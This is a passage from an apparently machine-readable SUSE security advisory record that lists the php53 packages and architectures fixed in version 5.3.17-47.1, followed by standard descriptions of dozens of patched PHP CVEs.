"packageName": "php53-zlib", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.s390x.rpm", "packageName": "php53-snmp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.x86_64.rpm", "packageName": "php53-sysvmsg", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.s390x.rpm", "packageName": "php53-wddx", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.s390x.rpm", "packageName": "php53-pdo", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.s390x.rpm", "packageName": "php53-pcntl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-openssl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.x86_64.rpm", "packageName": "php53-shmop", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-iconv-5.3.17-47.1.s390x.rpm", "packageName": "php53-iconv", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-odbc-5.3.17-47.1.x86_64.rpm", "packageName": "php53-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.s390x.rpm", "packageName": "php53-tokenizer", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xsl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mysql-5.3.17-47.1.s390x.rpm", "packageName": "php53-mysql", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-tokenizer-5.3.17-47.1.x86_64.rpm", "packageName": "php53-tokenizer", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zlib-5.3.17-47.1.x86_64.rpm", "packageName": "php53-zlib", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xsl-5.3.17-47.1.i586.rpm", "packageName": "php53-xsl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.s390x.rpm", "packageName": "php53-bz2", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-json-5.3.17-47.1.i586.rpm", "packageName": "php53-json", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ldap-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvmsg-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvmsg", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.i586.rpm", "packageName": "php53-calendar", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-shmop-5.3.17-47.1.i586.rpm", "packageName": "php53-shmop", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-suhosin-5.3.17-47.1.x86_64.rpm", "packageName": "php53-suhosin", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-exif-5.3.17-47.1.s390x.rpm", "packageName": "php53-exif", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.i586.rpm", "packageName": "php53-fileinfo", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlrpc", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ctype-5.3.17-47.1.x86_64.rpm", "packageName": "php53-ctype", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.s390x.rpm", "packageName": "php53-openssl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.s390x.rpm", "packageName": "php53-zip", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pcntl-5.3.17-47.1.i586.rpm", "packageName": "php53-pcntl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.x86_64.rpm", "packageName": "php53-pear", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dba-5.3.17-47.1.i586.rpm", "packageName": "php53-dba", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvsem-5.3.17-47.1.i586.rpm", "packageName": "php53-sysvsem", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.s390x.rpm", "packageName": "php53-gmp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlrpc", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.i586.rpm", "packageName": "php53-curl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pear-5.3.17-47.1.i586.rpm", "packageName": "php53-pear", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.s390x.rpm", "packageName": "php53-fileinfo", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pdo-5.3.17-47.1.i586.rpm", "packageName": "php53-pdo", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.i586.rpm", "packageName": "php53-gettext", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlreader", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.x86_64.rpm", "packageName": "php53-curl", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gmp-5.3.17-47.1.i586.rpm", "packageName": "php53-gmp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-sysvshm-5.3.17-47.1.s390x.rpm", "packageName": "php53-sysvshm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlwriter", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-calendar-5.3.17-47.1.x86_64.rpm", "packageName": "php53-calendar", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-5.3.17-47.1.s390x.rpm", "packageName": "php53", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlrpc-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlrpc", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-ftp-5.3.17-47.1.s390x.rpm", "packageName": "php53-ftp", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-snmp-5.3.17-47.1.i586.rpm", "packageName": "php53-snmp", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-wddx-5.3.17-47.1.x86_64.rpm", "packageName": "php53-wddx", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fileinfo-5.3.17-47.1.x86_64.rpm", "packageName": "php53-fileinfo", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pspell-5.3.17-47.1.i586.rpm", "packageName": "php53-pspell", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.x86_64.rpm", "packageName": "php53-mbstring", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.i586.rpm", "packageName": "php53-pgsql", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mbstring-5.3.17-47.1.i586.rpm", "packageName": "php53-mbstring", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-openssl-5.3.17-47.1.i586.rpm", "packageName": "php53-openssl", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-gettext-5.3.17-47.1.s390x.rpm", "packageName": "php53-gettext", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-fastcgi-5.3.17-47.1.x86_64.rpm", "packageName": "php53-fastcgi", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-mcrypt-5.3.17-47.1.s390x.rpm", "packageName": "php53-mcrypt", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.i586.rpm", "packageName": "php53-xmlreader", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-curl-5.3.17-47.1.s390x.rpm", "packageName": "php53-curl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.x86_64.rpm", "packageName": "apache2-mod_php53", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-dom-5.3.17-47.1.x86_64.rpm", "packageName": "php53-dom", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-intl-5.3.17-47.1.s390x.rpm", "packageName": "php53-intl", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlreader-5.3.17-47.1.s390x.rpm", "packageName": "php53-xmlreader", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-zip-5.3.17-47.1.i586.rpm", "packageName": "php53-zip", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-xmlwriter-5.3.17-47.1.x86_64.rpm", "packageName": "php53-xmlwriter", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bcmath-5.3.17-47.1.i586.rpm", "packageName": "php53-bcmath", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "apache2-mod_php53-5.3.17-47.1.s390x.rpm", "packageName": "apache2-mod_php53", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-pgsql-5.3.17-47.1.s390x.rpm", "packageName": "php53-pgsql", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "5.3.17-47.1", "packageFilename": "php53-bz2-5.3.17-47.1.x86_64.rpm", "packageName": "php53-bz2", "arch": "x86_64", "operator": "lt"}], "edition": 1, "description": "This update for php53 to version 5.3.17 fixes the following issues:\n\n These security issues were fixed:\n - CVE-2016-5093: get_icu_value_internal out-of-bounds read (bnc#982010).\n - CVE-2016-5094: Don't create strings with lengths outside int range\n (bnc#982011).\n - CVE-2016-5095: Don't create strings with lengths outside int range\n (bnc#982012).\n - CVE-2016-5096: int/size_t confusion in fread (bsc#982013).\n - CVE-2016-5114: fpm_log.c memory leak and buffer overflow (bnc#982162).\n - CVE-2015-8879: The odbc_bindcols function in ext/odbc/php_odbc.c in PHP\n mishandles driver behavior for SQL_WVARCHAR columns, which allowed\n remote attackers to cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the odbc_fetch_array\n function to access a certain type of Microsoft SQL Server table\n (bsc#981050).\n - CVE-2015-4116: Use-after-free vulnerability in the spl_ptr_heap_insert\n function in ext/spl/spl_heap.c in PHP allowed remote attackers to\n execute arbitrary code by triggering a failed SplMinHeap::compare\n operation (bsc#980366).\n - CVE-2015-8874: Stack consumption vulnerability in GD in PHP allowed\n remote attackers to cause a denial of service via a crafted\n imagefilltoborder call (bsc#980375).\n - CVE-2015-8873: Stack consumption vulnerability in Zend/zend_exceptions.c\n in PHP allowed remote attackers to cause a denial of service\n (segmentation fault) via recursive method calls (bsc#980373).\n - CVE-2016-4540: The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829).\n - CVE-2016-4541: The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via a negative offset (bsc#978829.\n - CVE-2016-4542: The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP did not properly construct spprintf arguments, which allowed remote\n attackers to cause a denial of service (out-of-bounds read) or possibly\n have unspecified other impact via crafted header data (bsc#978830).\n - CVE-2016-4543: The exif_process_IFD_in_JPEG function in ext/exif/exif.c\n in PHP did not validate IFD sizes, which allowed remote attackers to\n cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4544: The exif_process_TIFF_in_JPEG function in ext/exif/exif.c\n in PHP did not validate TIFF start data, which allowed remote attackers\n to cause a denial of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header data (bsc#978830.\n - CVE-2016-4537: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n accepted a negative integer for the scale argument, which allowed remote\n attackers to cause a denial of service or possibly have unspecified\n other impact via a crafted call (bsc#978827).\n - CVE-2016-4538: The bcpowmod function in ext/bcmath/bcmath.c in PHP\n modified certain data structures without considering whether they are\n copies of the _zero_, _one_, or _two_ global variable, which allowed\n remote attackers to cause a denial of service or possibly have\n unspecified other impact via a crafted call (bsc#978827).\n - CVE-2016-4539: The xml_parse_into_struct function in ext/xml/xml.c in\n PHP allowed remote attackers to cause a denial of service (buffer\n under-read and segmentation fault) or possibly have unspecified other\n impact via crafted XML data in the second argument, leading to a parser\n level of zero (bsc#978828).\n - CVE-2016-4342: ext/phar/phar_object.c in PHP mishandles zero-length\n uncompressed data, which allowed remote attackers to cause a denial of\n service (heap memory corruption) or possibly have unspecified other\n impact via a crafted (1) TAR, (2) ZIP, or (3) PHAR archive (bsc#977991).\n - CVE-2016-4346: Integer overflow in the str_pad function in\n ext/standard/string.c in PHP allowed remote attackers to cause a denial\n of service or possibly have unspecified other impact via a long string,\n leading to a heap-based buffer overflow (bsc#977994).\n - CVE-2016-4073: Multiple integer overflows in the mbfl_strcut function in\n ext/mbstring/libmbfl/mbfl/mbfilter.c in PHP allowed remote attackers to\n cause a denial of service (application crash) or possibly execute\n arbitrary code via a crafted mb_strcut call (bsc#977003).\n - CVE-2015-8867: The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP incorrectly relied on the deprecated\n RAND_pseudo_bytes function, which made it easier for remote attackers to\n defeat cryptographic protection mechanisms via unspecified vectors\n (bsc#977005).\n - CVE-2016-4070: Integer overflow in the php_raw_url_encode function in\n ext/standard/url.c in PHP allowed remote attackers to cause a denial of\n service (application crash) via a long string to the rawurlencode\n function (bsc#976997).\n - CVE-2015-8866: ext/libxml/libxml.c in PHP when PHP-FPM is used, did not\n isolate each thread from libxml_disable_entity_loader changes in other\n threads, which allowed remote attackers to conduct XML External Entity\n (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document,\n a related issue to CVE-2015-5161 (bsc#976996).\n - CVE-2015-8838: ext/mysqlnd/mysqlnd.c in PHP used a client SSL option to\n mean that SSL is optional, which allowed man-in-the-middle attackers to\n spoof servers via a cleartext-downgrade attack, a related issue to\n CVE-2015-3152 (bsc#973792).\n - CVE-2015-8835: The make_http_soap_request function in\n ext/soap/php_http.c in PHP did not properly retrieve keys, which allowed\n remote attackers to cause a denial of service (NULL pointer dereference,\n type confusion, and application crash) or possibly execute arbitrary\n code via crafted serialized data representing a numerically indexed\n _cookies array, related to the SoapClient::__call method in\n ext/soap/soap.c (bsc#973351).\n - CVE-2016-3141: Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP allowed remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly have unspecified\n other impact by triggering a wddx_deserialize call on XML data\n containing a crafted var element (bsc#969821).\n - CVE-2016-3142: The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a PK\\x05\\x06\n signature at an invalid location (bsc#971912).\n - CVE-2014-9767: Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in PHP\n ext/zip/ext_zip.cpp in HHVM allowed remote attackers to create arbitrary\n empty directories via a crafted ZIP archive (bsc#971612).\n - CVE-2016-3185: The make_http_soap_request function in\n ext/soap/php_http.c in PHP allowed remote attackers to obtain sensitive\n information from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized _cookies data,\n related to the SoapClient::__call method in ext/soap/soap.c (bsc#971611).\n - CVE-2016-2554: Stack-based buffer overflow in ext/phar/tar.c in PHP\n allowed remote attackers to cause a denial of service (application\n crash) or possibly have unspecified other impact via a crafted TAR\n archive (bsc#968284).\n - CVE-2015-7803: The phar_get_entry_data function in ext/phar/util.c in\n PHP allowed remote attackers to cause a denial of service (NULL pointer\n dereference and application crash) via a .phar file with a crafted TAR\n archive entry in which the Link indicator references a file that did not\n exist (bsc#949961).\n - CVE-2015-6831: Multiple use-after-free vulnerabilities in SPL in PHP\n allowed remote attackers to execute arbitrary code via vectors involving\n (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList,\n which are mishandled during unserialization (bsc#942291).\n - CVE-2015-6833: Directory traversal vulnerability in the PharData class\n in PHP allowed remote attackers to write to arbitrary files via a ..\n (dot dot) in a ZIP archive entry that is mishandled during an extractTo\n call (bsc#942296.\n - CVE-2015-6836: The SoapClient __call method in ext/soap/soap.c in PHP\n did not properly manage headers, which allowed remote attackers to\n execute arbitrary code via crafted serialized data that triggers a "type\n confusion" in the serialize_function_call function (bsc#945428).\n - CVE-2015-6837: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation during initial error checking, which allowed remote attackers\n to cause a denial of service (NULL pointer dereference and application\n crash) via a crafted XML document, a different vulnerability than\n CVE-2015-6838 (bsc#945412).\n - CVE-2015-6838: The xsl_ext_function_php function in\n ext/xsl/xsltprocessor.c in PHP when libxml2 is used, did not consider\n the possibility of a NULL valuePop return value proceeding with a free\n operation after the principal argument loop, which allowed remote\n attackers to cause a denial of service (NULL pointer dereference and\n application crash) via a crafted XML document, a different vulnerability\n than CVE-2015-6837 (bsc#945412).\n - CVE-2015-5590: Stack-based buffer overflow in the phar_fix_filepath\n function in ext/phar/phar.c in PHP allowed remote attackers to cause a\n denial of service or possibly have unspecified other impact via a large\n length value, as demonstrated by mishandling of an e-mail attachment by\n the imap PHP extension (bsc#938719).\n - CVE-2015-5589: The phar_convert_to_other function in\n ext/phar/phar_object.c in PHP did not validate a file pointer a close\n operation, which allowed remote attackers to cause a denial of service\n (segmentation fault) or possibly have unspecified other impact via a\n crafted TAR archive that is mishandled in a Phar::convertToData call\n (bsc#938721).\n - CVE-2015-4602: The __PHP_Incomplete_Class function in\n ext/standard/incomplete_class.c in PHP allowed remote attackers to cause\n a denial of service (application crash) or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935224).\n - CVE-2015-4599: The SoapFault::__toString method in ext/soap/soap.c in\n PHP allowed remote attackers to obtain sensitive information, cause a\n denial of service (application crash), or possibly execute arbitrary\n code via an unexpected data type, related to a "type confusion" issue\n (bsc#935226).\n - CVE-2015-4600: The SoapClient implementation in PHP allowed remote\n attackers to cause a denial of service (application crash) or possibly\n execute arbitrary code via an unexpected data type, related to "type\n confusion" issues in the (1) SoapClient::__getLastRequest, (2)\n SoapClient::__getLastResponse, (3) SoapClient::__getLastRequestHeaders,\n (4) SoapClient::__getLastResponseHeaders, (5) SoapClient::__getCookies,\n and (6) SoapClient::__setCookie methods (bsc#935226).\n - CVE-2015-4601: PHP allowed remote attackers to cause a denial of service\n (application crash) or possibly execute arbitrary code via an unexpected\n data type, related to "type confusion" issues in (1)\n ext/soap/php_encoding.c, (2) ext/soap/php_http.c, and (3)\n ext/soap/soap.c, a different issue than CVE-2015-4600 (bsc#935226.\n - CVE-2015-4603: The exception::getTraceAsString function in\n Zend/zend_exceptions.c in PHP allowed remote attackers to execute\n arbitrary code via an unexpected data type, related to a "type\n confusion" issue (bsc#935234).\n - CVE-2015-4644: The php_pgsql_meta_data function in pgsql.c in the\n PostgreSQL (aka pgsql) extension in PHP did not validate token\n extraction for table names, which might allowed remote attackers to\n cause a denial of service (NULL pointer dereference and application\n crash) via a crafted name. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2015-1352 (bsc#935274).\n - CVE-2015-4643: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow. NOTE: this vulnerability exists because of an incomplete fix\n for CVE-2015-4022 (bsc#935275).\n - CVE-2015-3411: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n load method, (2) the xmlwriter_open_uri function, (3) the finfo_file\n function, or (4) the hash_hmac_file function, as demonstrated by a\n filename\\0.xml attack that bypasses an intended configuration in which\n client users may read only .xml files (bsc#935227).\n - CVE-2015-3412: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read arbitrary files via\n crafted input to an application that calls the\n stream_resolve_include_path function in ext/standard/streamsfuncs.c, as\n demonstrated by a filename\\0.extension attack that bypasses an intended\n configuration in which client users may read files with only one\n specific extension (bsc#935229).\n - CVE-2015-4598: PHP did not ensure that pathnames lack %00 sequences,\n which might have allowed remote attackers to read or write to arbitrary\n files via crafted input to an application that calls (1) a DOMDocument\n save method or (2) the GD imagepsloadfont function, as demonstrated by a\n filename\\0.html attack that bypasses an intended configuration in which\n client users may write to only .html files (bsc#935232).\n - CVE-2015-4148: The do_soap_call function in ext/soap/soap.c in PHP did\n not verify that the uri property is a string, which allowed remote\n attackers to obtain sensitive information by providing crafted\n serialized data with an int data type, related to a "type confusion"\n issue (bsc#933227).\n - CVE-2015-4024: Algorithmic complexity vulnerability in the\n multipart_buffer_headers function in main/rfc1867.c in PHP allowed\n remote attackers to cause a denial of service (CPU consumption) via\n crafted form data that triggers an improper order-of-growth outcome\n (bsc#931421).\n - CVE-2015-4026: The pcntl_exec implementation in PHP truncates a pathname\n upon encountering a \\x00 character, which might allowed remote attackers\n to bypass intended extension restrictions and execute files with\n unexpected names via a crafted first argument. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2006-7243 (bsc#931776).\n - CVE-2015-4022: Integer overflow in the ftp_genlist function in\n ext/ftp/ftp.c in PHP allowed remote FTP servers to execute arbitrary\n code via a long reply to a LIST command, leading to a heap-based buffer\n overflow (bsc#931772).\n - CVE-2015-4021: The phar_parse_tarfile function in ext/phar/tar.c in PHP\n did not verify that the first character of a filename is different from\n the \\0 character, which allowed remote attackers to cause a denial of\n service (integer underflow and memory 